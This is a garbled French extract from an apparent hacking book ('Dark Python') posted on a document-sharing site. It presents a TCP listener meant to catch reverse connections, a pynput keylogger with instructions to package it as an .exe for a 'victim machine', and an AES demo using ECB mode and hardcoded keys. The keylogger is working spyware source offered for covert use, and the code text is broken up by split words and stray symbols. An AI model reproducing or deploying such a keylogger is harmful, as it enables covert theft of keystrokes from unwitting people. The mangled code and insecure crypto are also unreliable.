Remerciez-le!

Remerciez @Admin pour avoir partagé cet document gratuitement, de la manière la plus simple, en partageant sur les réseaux sociaux.

DARK PYTHON 3 scripts que chaque hacker doit savoir coder. B.Anass Est-ce que v

DARK PYTHON 3 scripts que chaque hacker doit savoir coder. B.Anass Est-ce que vous vous êtes déjà poser la question suivante : Pourquoi le langage de programmation Python est-il très utile pour les hackers ? Et bien, Lorsque vous commencez à apprendre le hacking, Python est l’arme idéale que vous devez maîtrisez. Avec une énorme bibliothèque standard et un système d’emballage qui met à votre portée des outils et des frameworks prédéfinis. Python est le langage de script dominant dans le domaine de la sécurité informatique et le hacking, même si que le débat sur le meilleur langage de script n’est qu’une perte de temps car chacun ses préférences chacun des langage à son terrain d’application, et c’est ça le point fort d’apprendre un langage de programmation...... Ça vous donne assez de flexibilité pour créer vos outils sans être coincé dans un cadre d’outils écrit par d’autres codeurs. L’un des avantages de Python est ça puissance simplifié ᛗ, vous pouvez pratiquement tous avec Python ..... Il suffit de maîtriser. Dans ce guide, je vais vous présenter 3 scripts que vous devez impérativement apprendre à coder en tant que hacker, car dans le milieu professionnel souvent le pentester n’aura dans son kit d’arme qu’un shell Python depuis lequel il va devoir exécuté ses tests. Dans ce cas, la capacité de coder rapidement des outils qui vous aident à votre test est primordiale, vous n’allez pas surtout pas vous concentrer sur la beauté ou l’optimisation de votre code, juste un code qui va faire le travail. La plupart de ces scripts sont simples et faciles à écrire ça ne nécessite qu'une compréhension des bases du langage, donc si vous savez ce qu’est une variable, liste, dictionnaire, tuple, objet...... Vous pouvez facilement comprendre la logique derrière le fonctionnement de ces scripts. PYTHON.... RÉSEAUX : En tant que haker votre arène est le réseau, cela veut dire que vous devez avoir une compréhension approfondie sur ce dernier, et la meilleure façon de le faire, c’est de construire un ᛲ. L’un des plus riche module de Python est socket, c’est un module qui vous permet par exemple de créer des TCP et UDP clients, serveurs ainsi que la facilité de les manipulés. So let’s take a look at : 1- Création d’un serveur TCP : C’est l’un des plus simple code que vous alliez écrire durant toute votre vie ᛘ. Pour comprendre mon objectif derrière la demonstration de tels scripts, imaginez que vous êtes dans une situation ou vous n’avez qu’un shell python sur votre machine et que c’est tout ce que vous avez pour introduire un réseau !! Assez fort eh !. Tout d’abord, je vous passe un résumé sur les commandes de bases afin que vous puissiez comprendre le code qu’on va écrire : Maintenant voici un simple script qui vous permet de créer un serveur qui va écouter une connexion inverse : # -*- coding: utf-8 -* im port socke t PORT = 8080 # cré a tion de socke t se rve ur = socke t.socke t() print("[*]socke t cré e ....") # bind a ve c le PORT se rve ur.bind(('',PORT)) print('[*]bind a ve c le port %s'%(PORT)) # Ecoute de la conne xion inve rse se rve ur.liste n(5) print('[*]socke t liste ning....') # On cré e une loop e n a tte nte de la conne xion while True : c, a dre sse = se rve ur.a cce pt() print('[*]conne ct :',a dre sse ) La première ligne correspond à l’encodage utilisé dans le code, Python utilise par défaut l’encodage ascii et si on ne lui précise pas notre propre encodage (qui supporte les accents et tout ᛟ) il va lever une erreur. Puis j’ai importé le module socket, et j’ai créé une variable qui contient le port depuis lequel je devrais recevoir ma connexion. Ça ne reste que de créer les variables qui définissent notre serveur puis attacher le socket avec le port et enfin mettre le serveur en écoute. J’ai utilisé une boucle à la fin avec le mot-clé while afin que mon code reste en attente de la connexion distante et qui va devoir afficher l’adresse IP du serveur qui l’a sollicité. Sauvegardez le script sous le nom SERVEUR.py puis en l’executant Le serveur va attendre une connexion. Vous pouvez le tester en envoyant quelques paquets de tests en utilisant telnet ou netcat : Voilà, je me suis connecté avec succès. Ceci va vous être utile dans le cas ou vous créez des payloads pour contrôler des machines à distances. 2- KEYLOGGER : Un keylogger est une application (ou dispositif) qui tourne en arrière-plan, son travail est d’enregistrer tous les touches tapé sur le clavier. On va en créer un avec Python. Pour commencer, on a besoin du module “pynput” qui n’est pas disponible dans la librairie standard de Python, vous pouvez l’installer avec la commande suivante : Pip3 install pynput Assurez que le module a été bien installer en l’important dans l’idle comme suit : Créez un nouveau fichier sous le nom keylogger.py et importer ce qui suit : from pynput.ke yboa rd im port Ke y, Liste ne r im port logging Ensuite, vous definissez une variable qui pointe vers l’endroit ou vous souhaitez enregistrer les logs, vous pouvez la laissez vide pour sauvgarder à coté du script keylogger.py , configurez ensuite le module de journalisation comme indiqué ci-dessous : log_dir = "" logging.ba sicConfig(file na m e = (log_dir + "log.txt"), le ve l= logging.DEBUG, form a t= '%(a sctim e )s: %(m e ssa ge )s') Créez ensuite une définissions pour les pressions de touche appelé on_press qui prend “key” comme paramètre en utilisant la méthode info : de f on_pre ss(ke y): logging.info(str(ke y)) Pour terminier, configurez le listener : with Liste ne r(on_pre ss= on_pre ss) a s liste ne r: liste ne r.join() Pour terminer, configurez le listener : with Liste ne r(on_pre ss= on_pre ss) a s liste ne r: liste ne r.join() Maintenant exécutez le script et faites une recherche sur votre navigateur : Puis arrêtez le script, et afficher le contenu de log,txt : Il ne vous reste qu’à convertir le script en exécutable en utilisant pyinstaller. D’abord, installez pyinstaller avec la commande : Pip install pyinstaller Puis avec convertissez le fichier keylogger.py en exe : Pyinstaller keylogger.py -F Vous trouverez le script d’envoi du fichier log.txt par e-mail depuis la machine victime dans mon livre Dark python : Apprenez à créer vos propres outils de hacking. 3-Encrypteur : Dans cette partie, nous allons créer un encrypteur, mais avant d’entamer le code qu’est ce que la cryptographie ? La cryptographie est un le processus de transformation d’un texte qui du sens en un texte qui n’a pas de sens pour celui qui ne lui ai pas destiné!! Assez simple ᛗ. Pour crypter, on a besoin d’un algorithme (ou cipher) et une clé, la puissance du cipher est mesuré par la difficulté de le casser. Pour cette démonstration, je vais utiliser AES(advanced encryption standard) qui est un cipher symétrique (à la fois, l’expéditeur et le destinataire ont la même clé). Tout d’abord, importez la fonction AES depuis le module Crypto.Cipher : from Crypto.Ciphe r im port AES Ensuite, créez la clé et le message que vous voulez utiliser : ke y = "clé chiffre m e nt" # la clé de vra it ê tre 16, 24, 32 byte s de longue ur m e ssa ge = "m e ssa ge se cre t0x" # de vra it ê tre pa rm i le s m ultiple s de 16. Puis générez la clé AES et encryptez le message avec la syntaxe suivante : Ciphe r = AES.ne w(ke y) ciphe rte xt = Ciphe r.e ncrypt(pla in) Enfin, afficher le message encrypté : print ciphe rte xt.e ncode ('he x') Et pour décrypter le message, il suffit d’ajouter cette ligne de code : de c_m e ssa ge = Ciphe r.de crypt(ciphe rte xt) À la fin, On aura quelque chose comme ça : # -*- coding: utf-8 -* from Crypto.Ciphe r im port AES ke y = "cle chiffre m e nt" e nc_m e ssa ge = "m e ssa ge se cre t0x" Ciphe r = AES.ne w(ke y) ciphe rte xt = Ciphe r.e ncrypt(e nc_m e ssa ge ) print ("m e ssa ge _e ncrypte : ",ciphe rte xt.e ncode ('he x')) de c_m e ssa ge = Ciphe r.de crypt(ciphe rte xt) print("m e ssa ge _de crypte : ",de c_m e ssa ge ) Voila, si vous executez le code vous aurez à la fois les deux deux message encrypté et décrypté : Si vous voulez aller plus loin... Si vous voulez approfondir vos connaissances en Python ou si vous n’avez pas bien compris les codes que je vous ai présentés précédemment, ce n'est pas grave ᛟ. J’ai écrit un livre intitulé Dark Python: Apprenez à créer vos propres outils de hacking. CAR VOUS NE uploads/S4/ dark-python-book-pdf.pdf